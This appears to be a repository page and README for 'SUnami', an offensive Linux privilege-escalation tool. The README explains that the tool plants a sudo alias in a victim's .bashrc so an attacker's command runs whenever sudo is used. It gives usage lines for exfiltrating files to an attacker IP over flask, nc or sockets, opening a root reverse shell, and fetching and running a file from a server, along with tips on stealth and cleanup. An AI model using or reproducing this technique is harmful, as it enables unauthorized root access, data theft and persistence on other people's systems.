Go to file
alchemist b2878b72db updated getenvs.sh file 2023-08-08 18:36:14 +03:00
lib added help command; made -listen and -local flag easier to use 2023-08-08 01:04:13 +03:00
templates/rfs updated getenvs.sh file 2023-08-08 18:36:14 +03:00
README.md added help command; made -listen and -local flag easier to use 2023-08-08 01:04:13 +03:00
sunami.py test commit 2 2023-08-08 01:30:02 +03:00

README.md

SUnami

Struggling with linux priveledge escelation? well then its time to cheese it with SUnami.
0 interaction privesc is always recommended but not always achievable. For this reason we have created a tool for the most trivial priv esc in history (with a few drawbacks).
This is not an exploit just a cheap but effective trick. The usecase is when you have a shell on a sudoers account but no sudo cred.
It works by manipulating sudo via aliasing in their .bashrc file to prepend a malicious attacker specified command first in the background.
This does mean you will need to wait for sudo to be executed.
flags denoted with -- are required. with - optional.
the -local flag denotes that you want sunami to modify the .bashrc file on the current machine instead of producing output (not suggested for stealth reasons).

Authors

witchdocsec, TheA1ch3m1st

Notice

using the shells and socket based exfil will throw an error in the targets shell if your listener isn't active. be sure to clean up after gaining root. For the most stealth with file exfil we suggest the built in flask server. Currently our built in listener works best with bash shells. for nc shells using ncs own listener is recommended.

File Exfiltration

I used passwd so as not to leak my hash for this demo but rest assured you can read whatever file you wish image

useage:

sunami.py [-local {1,0}] exfilfile [--file FILE] [--method {postflask,nc,pysocket}] [--ip IP] [--port PORT]

Root Shell

image

useage:

sunami.py [-local {1,0}] genshell [--ip IP] [--port PORT] [-shell SHELL] [-protocol PROTOCOL] [-listen {1,0}]

Run From Server

image

useage

sunami.py [-local {1,0}] rfs [-h] --ip IP --port PORT --file FILE [--vars VARS [VARS ...]] [--schema SCHEMA]